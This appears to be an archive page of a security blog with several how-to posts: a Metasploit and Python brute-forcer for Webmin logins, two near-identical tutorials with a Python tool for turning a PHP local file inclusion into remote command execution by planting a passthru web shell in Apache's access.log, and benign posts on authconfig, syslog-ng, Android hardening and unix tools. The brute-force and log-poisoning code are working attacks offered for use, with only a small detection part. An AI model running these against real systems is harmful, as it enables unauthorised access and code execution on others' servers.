Mar 14, 2014

Howto: Brute force webmin with Metasploit

Webmin serves its web UI on TCP/10000 over HTTPS by default, which is why RPORT and SSL are set below; the module reads one candidate password per line from PASS_FILE and tries each one against USERNAME.

msf auxiliary(webmin_login_brute) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf auxiliary(webmin_login_brute) > set RPORT 10000
RPORT => 10000
msf auxiliary(webmin_login_brute) > set SSL TRUE
SSL => TRUE
msf auxiliary(webmin_login_brute) > set BLANK_PASSWORDS false
BLANK_PASSWORDS => false
msf auxiliary(webmin_login_brute) > set USER_AS_PASS false
USER_AS_PASS => false
msf auxiliary(webmin_login_brute) > set USERNAME root
USERNAME => root
msf auxiliary(webmin_login_brute) > set PASS_FILE /root/.msf4/data/wordlists/webmin_defaults.txt
PASS_FILE => /root/.msf4/data/wordlists/webmin_defaults.txt
msf auxiliary(webmin_login_brute) > run
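The same run written out in plain Python, as an added example that is not code from this post and not the Metasploit module's code. It keeps the decision logic (candidate ordering for BLANK_PASSWORDS and USER_AS_PASS, and the success check) separate from the TLS transport, so the logic can be exercised offline. The login path /session_login.cgi, the form field names, and the "sid=" cookie as the success indicator are assumptions not confirmed by the page; the host, port and word list in the main block are placeholders.

```python
"""Password guessing against a Webmin login form, written as an added example
for this post; it is not code from the post or from the Metasploit module.
It mirrors the options set above (USERNAME, PASS_FILE, BLANK_PASSWORDS,
USER_AS_PASS, SSL, RPORT 10000) and keeps the network transport separate
from the decision logic so the latter can be exercised offline.

Assumptions not confirmed by the page: Webmin's login form posts to
/session_login.cgi with the fields "page", "user" and "pass", and a
successful login answers with a redirect that sets a "sid=" session cookie.
Host, port and the word list in __main__ are placeholders."""
import http.client
import ssl
import time
import urllib.parse
from typing import Callable, Iterable, List, Optional, Sequence, Tuple

LOGIN_PATH = "/session_login.cgi"  # assumed Webmin login handler
Headers = List[Tuple[str, str]]
Sender = Callable[[str], Tuple[int, Headers]]  # form body -> (status, headers)


def build_login_body(user: str, password: str, page: str = "/") -> str:
    """Form body the Webmin login page submits (assumed field names)."""
    return urllib.parse.urlencode({"page": page, "user": user, "pass": password})


def login_succeeded(status: int, headers: Sequence[Tuple[str, str]]) -> bool:
    """A failed login re-renders the form with 200; a good one redirects and
    hands out the session cookie. Both are required, so a stray redirect
    (for example to the HTTPS port) is not counted as a hit."""
    cookies = [v for k, v in headers if k.lower() == "set-cookie"]
    return status in (301, 302, 303) and any("sid=" in c for c in cookies)


def candidate_passwords(username: str, wordlist: Iterable[str],
                        blank: bool = False, user_as_pass: bool = False) -> List[str]:
    """Order the guesses the way the module options do: the blank password
    first (BLANK_PASSWORDS), then the username itself (USER_AS_PASS), then
    the word list, with duplicates dropped so no guess is sent twice."""
    ordered = ([""] if blank else []) + ([username] if user_as_pass else []) + list(wordlist)
    seen, out = set(), []
    for pw in ordered:
        if pw not in seen:
            seen.add(pw)
            out.append(pw)
    return out


def guess(sender: Sender, username: str, wordlist: Iterable[str],
          blank: bool = False, user_as_pass: bool = False,
          delay: float = 1.0) -> Optional[str]:
    """Try each candidate through `sender` and stop at the first success.
    `delay` throttles the attempts: Webmin can block a host after repeated
    failed logins, and every miss is written to its log anyway."""
    for pw in candidate_passwords(username, wordlist, blank, user_as_pass):
        status, headers = sender(build_login_body(username, pw))
        if login_succeeded(status, headers):
            return pw
        time.sleep(delay)
    return None


def https_sender(host: str, port: int = 10000, verify: bool = False) -> Sender:
    """Real transport: one POST per guess over TLS (SSL => TRUE above).
    Webmin normally serves a self-signed certificate, so verification is
    off by default; turn it on once you have pinned the expected cert."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE

    def send(body: str) -> Tuple[int, Headers]:
        conn = http.client.HTTPSConnection(host, port, context=ctx, timeout=10)
        try:
            conn.request("POST", LOGIN_PATH, body=body,
                         headers={"Content-Type": "application/x-www-form-urlencoded"})
            resp = conn.getresponse()
            resp.read()  # drain the body so the connection closes cleanly
            return resp.status, resp.getheaders()
        finally:
            conn.close()

    return send


if __name__ == "__main__":
    words = ["admin", "webmin", "changeme"]  # stand-in for webmin_defaults.txt
    print("password:", guess(https_sender("192.168.1.1"), "root", words))
```

Because `guess` only sees a callable, the same loop can be pointed at a recorded response set or at a lab instance, and the success test can be tightened (for example, to also require the post-login page) without touching the transport.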
 
 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Pwning website with Local File Inclusion(LFI) English version

Following the news that a subdomain of yahoo.com had an LFI vulnerability, this post explains the last example given in that news item.
By Sumedt Jitpukdeobidn, Senior Security Researcher@I-Secure(www.i-secure.co.th)

1. First of all, we know that the target website has an LFI vulnerability:
- http://<target_domain>/include.php?file=poc.php
- http://<target_domain>/include.php?file=../../../../../../../etc/passwd
2. We can read the source code of include.php to find the parameters the page uses, with
http://<target_domain>/include.php?file=php://filter/convert.base64-encode/resource=include.php (the php://filter wrapper returns the file base64-encoded instead of executing it). After decoding and reviewing the source, we find that include.php has an id parameter.

3. We will use $id as the command parameter in the backdoor code that we inject into access.log. This works because an included file runs in the scope of include.php, so $id already holds the value of the id query parameter by the time the log is included.

4. <?php passthru($id) ?> is injected into access.log by sending it as part of an HTTP request, which Apache writes verbatim into the log. Send it with a raw client such as nc rather than a browser: a browser percent-encodes <, ? and spaces, and the logged text would then no longer be PHP.

5. Execute a command via LFI and the id parameter with http://localhost/include.php?id=whereis%20nc&file=../../../../../../var/log/apache2/access.log (the space in the command is percent-encoded, as for any query value).

*** By the way, if you don't want to depend on a parameter of include.php, you can create your own parameter with
GET /<?php passthru($_GET['command']); ?>
and then call the backdoor with a request like http://localhost/include.php?file=/var/log/apache2/access.log&command=pwd

Credit: https://twitter.com/ptantiku






Howto: Pwning website with Local File Inclusion(LFI)

Following the news of the LFI vulnerability found in Yahoo.com, some people asked what the last part of that article meant and whether it really works, so I wrote this post to explain it. Let me assume the following scenario.

By Sumedt Jitpukdeobidn, Senior Security Researcher@I-Secure(www.i-secure.co.th)

1. An LFI vulnerability is found at
- http://<target_domain>/include.php?file=poc.php
- http://<target_domain>/include.php?file=../../../../../../../etc/passwd
2. Check the source code of include.php to see which variables it has, using http://<target_domain>/include.php?file=php://filter/convert.base64-encode/resource=<filename.php>. We look at this because we want the file we include to share variables with include.php.

3. After checking, we find that there is a variable named id, so we create the backdoor by sending a request containing <?php passthru($id) ?> (shown in the screenshot of the original post).
*** Why step 3 differs from the example in the news: the include function cannot be used as http://<target_name>/include.php?file=../../../../../../var/log/apache2/access.log?v=pwd, because include would try to open the file "../../../../../../var/log/apache2/access.log?v=pwd", not the file "../../../../../../var/log/apache2/access.log". That is why we have to use a variable shared with include.php instead.

4. What happens is that Apache also stores that request, PHP code included, in the access log (the log of accesses to the website). That means access.log now contains the hacker's PHP backdoor code.
Example image: access.log with the PHP code embedded

5. The hacker then drives the backdoor by including /var/log/apache2/access.log through the LFI.

*** Note: if we do not want to depend on a variable of include.php, we can create the backdoor as
GET /<?php passthru($_GET['command']); ?>
and then call it with http://localhost/include.php?file=/var/log/apache2/access.log&command=pwd

Credit: https://twitter.com/ptantiku
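One Python example serving both the English and the Thai version of this post (added here; it is not code from the posts): it builds the log-poisoning request and the LFI trigger URL the posts describe, decodes the php://filter source dump from step 2, and, for the defender, scans access.log lines for the attack. The host name, the log path default and the three sample log lines are constructed for illustration; the only thing taken from the posts is the backdoor payload.

```python
"""Apache access.log poisoning through LFI, written as an added example for
the two posts above (English and Thai); it is not code from the posts.
It builds the poisoning request and the trigger URL the posts describe,
decodes the php://filter source dump from step 2, and, for the defender,
flags access.log lines that carry the attack. The host, paths and the
sample log lines are constructed for illustration."""
import base64
import re
import socket
import urllib.parse
from typing import List, Tuple

PAYLOAD = "<?php passthru($_GET['command']); ?>"  # backdoor from the post


def build_poison_request(host: str, payload: str = PAYLOAD,
                         where: str = "user-agent") -> bytes:
    """Raw HTTP request that makes Apache write `payload` into access.log.
    It is sent over a plain socket, not through a browser or HTTP library:
    those percent-encode '<', '?' and spaces in the path, and the logged
    text would then be harmless %3C%3Fphp instead of executable PHP.
    where="user-agent": payload in the User-Agent header, which the
    'combined' log format records verbatim (the reliable placement).
    where="path": payload in the request line, as the post does it."""
    if where == "path":
        request_line = f"GET /{payload} HTTP/1.0\r\n"
        user_agent = "Mozilla/5.0"
    else:
        request_line = "GET / HTTP/1.0\r\n"
        user_agent = payload
    return (request_line + f"Host: {host}\r\nUser-Agent: {user_agent}\r\n\r\n").encode()


def send_raw(host: str, port: int, request: bytes, timeout: float = 5.0) -> bytes:
    """Deliver the raw request byte-for-byte (what nc does interactively)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def build_source_disclosure_url(base: str, target: str = "include.php") -> str:
    """Step 2: the php://filter wrapper makes include() return the target's
    source base64-encoded instead of executing it."""
    return f"{base}?file=php://filter/convert.base64-encode/resource={target}"


def decode_filter_source(body: str) -> str:
    """Turn the base64 body returned by the URL above back into PHP source."""
    return base64.b64decode(body.strip()).decode("utf-8", "replace")


def build_trigger_url(base: str, log_path: str = "/var/log/apache2/access.log",
                      command: str = "id", param: str = "command") -> str:
    """Step 5: include the poisoned log and pass the command.
    The command travels in its own query parameter and is percent-encoded
    like any form value ('whereis nc' becomes whereis+nc). It cannot be
    appended to the file parameter: include() would then try to open a
    file literally named 'access.log?command=...' (the point made in the
    note of the Thai post). The traversal path is left untouched."""
    query = urllib.parse.urlencode({"file": log_path, param: command}, safe="/")
    return f"{base}?{query}"


# Defender side. The combined-format lines below are constructed; only the
# second (poisoning) and third (trigger) are malicious.
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(\.\./){2,}")

SAMPLE_LOG = "\n".join([
    '203.0.113.7 - - [14/Mar/2014:10:01:02 +0700] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Mar/2014:10:01:09 +0700] "GET / HTTP/1.0" 200 512 "-" '
    '"<?php passthru($_GET[\'command\']); ?>"',
    '203.0.113.7 - - [14/Mar/2014:10:01:15 +0700] "GET /include.php?file=../../../../../../'
    'var/log/apache2/access.log&command=pwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
])


def find_suspicious_lines(log_text: str) -> List[Tuple[int, str]]:
    """Return (line number, reason) for lines with a PHP open tag anywhere
    (never legitimate in a request line or User-Agent) or repeated '../'
    in the request (the LFI trigger itself)."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        if PHP_TAG.search(line):
            hits.append((number, "php-tag"))
        elif TRAVERSAL.search(line):
            hits.append((number, "traversal"))
    return hits


if __name__ == "__main__":
    print(build_poison_request("target.example", where="path").decode())
    print(build_trigger_url("http://target.example/include.php",
                            "../../../../../../var/log/apache2/access.log", "whereis nc"))
    print(find_suspicious_lines(SAMPLE_LOG))
```

The User-Agent placement is the one to reach for in practice: a payload in the request line can upset Apache's request parsing (the line still lands in the log, but the server answers 400), whereas a header value is logged as-is. On the defending side the two regexes are cheap enough to run over a whole log, and a hit on the PHP tag is also the signal to rotate the file, since every later include of it will execute the payload.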



Mar 13, 2014

Howto: Fix Authconfig command error with "locale.Error: unsupported locale setting"

Traceback (most recent call last):
  File "/usr/sbin/authconfig", line 32, in <module>
    locale.setlocale(locale.LC_ALL, '')
  File "/usr/lib64/python2.6/locale.py", line 513, in setlocale
    return _setlocale(category, locale)
locale.Error: unsupported locale setting

The error means the locale named by the environment (LANG or one of the LC_* variables) is not installed on this machine: setlocale(LC_ALL, '') reads those variables and fails when they name a locale that locale -a does not list. A common cause is an SSH client forwarding its own LANG/LC_* values to the server.

1. Fix it by modifying line 32 of /usr/sbin/authconfig

2. Change from locale.setlocale(locale.LC_ALL, '') to locale.setlocale(locale.LC_ALL, None)

3. Try to run it again. (authconfig --test | grep hashing | grep sha512)

*** Note: setlocale(LC_ALL, None) only queries the current locale and never sets one, so authconfig then simply runs in the C locale. Editing a packaged file is also undone by the next authconfig update and shows up in rpm -V authconfig; the cleaner fix is to run the command with a locale the system has, for example LC_ALL=C authconfig --test, or to install the missing locale.


Howto: Install Syslog-ng on CentOS 6.5

Install syslog-ng
(The sources below are fetched over plain FTP/HTTP; verify the tarballs against the upstream checksums or GPG signatures before building them as root.)
-    Install the required packages
o    yum install gcc zlib-devel libffi-devel
-    Install glib
o    cd /tmp
o    wget ftp://ftp.gtk.org/pub/glib/2.34/glib-2.34.0.tar.xz
o    tar xvf glib-2.34.0.tar.xz
o    cd glib-2.34.0
o    ./configure && make && make install
-    Install eventlog
o    wget http://www.balabit.com/downloads/files/syslog-ng/sources/3.5.3/source/eventlog_0.2.12+20120504+1700.tar.gz
o    tar xzvf eventlog_0.2.12+20120504+1700.tar.gz
o    cd eventlog-0.2.12    (the directory the tarball extracts to, not the .tar.gz file itself; confirm the name with ls)
o    ./configure && make && make install
-    Install libol
o    wget http://www.balabit.com/downloads/files/libol/0.3/libol-0.3.9.tar.gz
o    tar xzvf libol-0.3.9.tar.gz
o    cd libol-0.3.9
o    ./configure && make && make install
-    Install syslog-ng
o    wget http://www.balabit.com/downloads/files/syslog-ng/sources/3.5.3/source/syslog-ng_3.5.3.tar.gz
o    export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/include/:/usr/local/lib64/:/usr/local/lib/pkgconfig/:/usr/local/lib/    (so configure finds the glib and eventlog .pc files installed under /usr/local)
o    tar xzvf syslog-ng_3.5.3.tar.gz
o    cd syslog-ng-3.5.3
o    ./configure --sysconfdir=/etc/syslog-ng --prefix=/usr/local/syslog-ng
o    make && make install
o    echo /usr/local/lib > /etc/ld.so.conf.d/local.conf && ldconfig    (glib, eventlog and libol were installed under /usr/local/lib, which is not on the default library search path on CentOS; without this syslog-ng may fail to start with a missing shared library)
o    mkdir -p /etc/syslog-ng && cp /usr/local/etc/syslog-ng.conf /etc/syslog-ng/syslog-ng.conf    (the init script below starts syslog-ng with -f /etc/syslog-ng/syslog-ng.conf, the --sysconfdir given to configure, so the config must be copied there rather than to /etc/syslog-ng.conf)
o    Create the file /etc/init.d/syslog-ng with the following content
#!/bin/bash
# chkconfig: 2345 12 88
# description: syslog-ng

# Full path to daemon
INIT_PROG="/usr/local/syslog-ng/sbin/syslog-ng"
# options passed to daemon
INIT_OPTS="-f /etc/syslog-ng/syslog-ng.conf"

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/syslog-ng/bin:/usr/local/syslog-ng/sbin

INIT_NAME=`basename "$INIT_PROG"`

# Source Redhat function library.
. /etc/rc.d/init.d/functions

# Uncomment this if you are on Redhat and think this is useful
#. /etc/sysconfig/network
#if [ ${NETWORKING} = "no" ]
#then
#       exit 0
#fi

RETVAL=0

umask 077
ulimit -c 0

# See how we were called.
case "$1" in
  start)
    echo -n "Starting $INIT_NAME: "
    # --check takes the daemon's base name; it is what daemon() uses to see
    # whether the process is already running
    daemon --check "$INIT_NAME" "$INIT_PROG $INIT_OPTS"
    RETVAL=$?
    echo -n "Starting Kernel Logger: "
    [ -x "/sbin/klogd" ] && daemon klogd
    echo
    [ $RETVAL -eq 0 ] && touch "/var/lock/subsys/${INIT_NAME}"
    ;;
  stop)
    echo -n "Stopping $INIT_NAME: "
    killproc $INIT_PROG
    RETVAL=$?
    echo -n "Stopping Kernel Logger: "
    [ -x "/sbin/klogd" ] && killproc klogd
    echo
    [ $RETVAL -eq 0 ] && rm -f "/var/lock/subsys/${INIT_NAME}"
    ;;
  status)
    status $INIT_PROG
    RETVAL=$?
    ;;
  restart|reload)
    $0 stop
    $0 start
    RETVAL=$?
    ;;
  *)
    echo "Usage: $0 {start|stop|status|restart|reload}"
    exit 1
esac
exit $RETVAL
o    Make /etc/init.d/syslog-ng executable with
chmod +x /etc/init.d/syslog-ng
o    Register the script with chkconfig (it reads the "# chkconfig: 2345 12 88" header above for the runlevels and start/stop priorities)
chkconfig --add syslog-ng
o    Stop the stock syslog daemon first: CentOS 6.5 ships rsyslog, and two daemons cannot both own /dev/log and /proc/kmsg
service rsyslog stop && chkconfig rsyslog off
o    Test the script
/etc/init.d/syslog-ng start




Mar 12, 2014

Android Security Enhancements

Android Version | Security Enhancement | Details | Reference / Bypass (if applicable)
4.4 | dm-verity | Transparent integrity checking of block devices. dm-verity helps prevent persistent rootkits that can hold on to root privileges and compromise devices. |
4.4 | SELinux => enforcing mode | All root-domain binaries run in enforcing mode; the remaining domains still run in permissive mode. | SELinux details
4.4 | FORTIFY_SOURCE level 2 | Full source code compiled with FORTIFY_SOURCE; clang support added. |
4.4 | SSL CA certificate warnings | Warns when any certificate is added to the device certificate store. | Bypass already available
4.3 | Restrict setuid from Android apps | No Zygote-spawned process is allowed to execute setuid programs; /system is mounted nosuid. | Bypassed by Chainfire
4.3 | FORTIFY_SOURCE | Android x86 and MIPS, plus fortified strchr(), strrchr(), strlen() and umask() calls. |
4.3 | SELinux => permissive mode | Allows logging but does not restrict actions. |
4.3 | Trusted Platform Module (TPM) support | Hardware-backed storage for KeyChain, making keys unavailable for extraction. |
4.2.2 | ADB authentication | Prevents unauthorised use of ADB by using an RSA keypair for authentication. | Android 4.3 Security Enhancement Announcement
4.2 | FORTIFY_SOURCE level 1 | Used by system libraries and applications to prevent memory corruption. |
4.2 | Application verification | The user can opt in to a client-side Bouncer instance, and Google can verify malicious applications before installation. |
4.2 | Certificate pinning | If the chain of certificates does not match, an error message is added. |
4.2 | installd config | installd runs as non-root from the start. |
4.2 | ContentProvider security | The default value of android:exported for content providers is false for apps targeting API level 17 or higher (it stays true for older targets). |
4.2 | init config | O_NOFOLLOW added to init to avoid symbolic-link attacks. |
4.2 | Premium SMS notification | SMS to premium numbers now display a notification and are only sent when explicitly accepted. |
4.2 | SecureRandom implementation | SecureRandom implementation based on OpenSSL; the Bouncy Castle implementation was removed. | details here
4.2 | JavascriptInterface annotation | Methods exposed to WebView JavaScript must carry the @JavascriptInterface annotation. Exploit possible for <4.2 devices and for applications targeting API < 17. | Reference: Metasploit module; test page that identifies whether the browser or WebView is vulnerable; additional details
4.2 | Cryptography | SSLSocket support for TLSv1.1 and TLSv1.2 using OpenSSL 1.0.1. |
4.1 | PIE (Position Independent Executable) support | Support for binaries compiled with GCC's -pie -fPIE flags (executables are position independent). |
4.1 | Read-only relocations / immediate binding | -Wl,-z,relro -Wl,-z,now |
4.1 | Kernel address leakage prevention | dmesg_restrict and kptr_restrict enabled. | kptr_restrict mitigates the Levitator exploit
4.1 | ELF hardening | RELRO / BIND_NOW flags by default. This hardens binaries against attacks that attempt to overwrite the GOT and other sensitive ELF structures by making them read-only at startup. | Breaks the Gingerbreak exploit; more details on RELRO here
4.1 | ASLR support | Full ASLR support. |
4.0.3 | Randomize heap/brk mapping | kernel.randomize_va_space is set to 2. |
4.0 | ASLR support | ASLR support started appearing, although not fully: the dynamic linker had no ASLR, and many more flaws are outlined in the reference link. | ASLR support review by Duo Security
3.0 | Full filesystem encryption | Full disk encryption added. | Details on this archive link
2.3 | Format string vulnerability protection | -Wformat-security -Werror=format-security added. |
2.3 | Code execution prevention on stack and heap | Hardware-based No eXecute (NX). |
2.3 | Null pointer dereference protection | mmap_min_addr |
2.2 | Device Administration | Android Device Administration API added. | Device Administration Guide
1.5 | Stack / buffer overrun protection | ProPolice to prevent stack buffer overruns (-fstack-protector). | Memory Management Enhancement: old archive link
1.5 | Integer overflow protection | safe_iop |
1.5 | Integer overflow in memory allocation | OpenBSD calloc |
1.5 | Chunk consolidation attack | Extensions to OpenBSD dlmalloc() to prevent double free(). |

Source: http://androidtamer.com/android-security-enhancements/




Tools: A little collection of cool unix terminal/console/curses tools

A little collection of cool unix terminal/console/curses tools
Just a list of 20 (now 28) tools for the command line. Some are little-known, some are just too useful to miss, some are pure obscure -- I hope you find something useful that you weren't aware of yet! Use your operating system's package manager to install most of them. (Thanks for the tips, everybody!)

dstat & sar

iostat, vmstat, ifstat and much more in one.

slurm

Visualizes network interface traffic over time.

vim & emacs

The real programmers' editors.

screen, dtach, tmux, byobu

Keep your terminal sessions alive.

multitail

See your log files in separate windows.

tpp

Presentation ("PowerPoint") tool for terminal.

xargs & parallel

Executes tasks from input (even multithread).

duplicity & rsyncrypto

Encrypting backup tools.

nethack & slash'em

Still the most complex game on the planet.

lftp

Does FTPS. Can mirror, kinda like rsync.

ack

A better grep for source code.

calcurse & remind + wyrd

Calendar systems.

newsbeuter & rsstail

Command line RSS readers.

powertop

Helps conserve power on Linux.

tig

A console UI for git.

qalc

The best calculator. Ever. (For scripts too.)

htop & iotop

Process, memory and io monitoring.

ttyrec & ipbt

Record and play back terminal sessions.

rsync

Keeps filesystems in sync over SSH.

mtr

traceroute 2.0.

socat & netpipes

Directing stuff easily in and out of sockets.

iftop, iptraf & nethogs

To see where your traffic goes.

siege & tsung

Command line load test tools.

ledger

Terminal-based accounting package.

taskwarrior

Todo management in the terminal.

curl

Everybody's favorite HTTP toolbox.

rtorrent & aria2

Command line torrent downloaders.

ttytter & earthquake

Nice trendy Twitter clients :)

vifm & ranger

Alternatives to the midnight commander.

cloc

Counts lines of code.

ipcalc

For network assignments.



Source: http://kkovacs.eu/cool-but-obscure-unix-tools

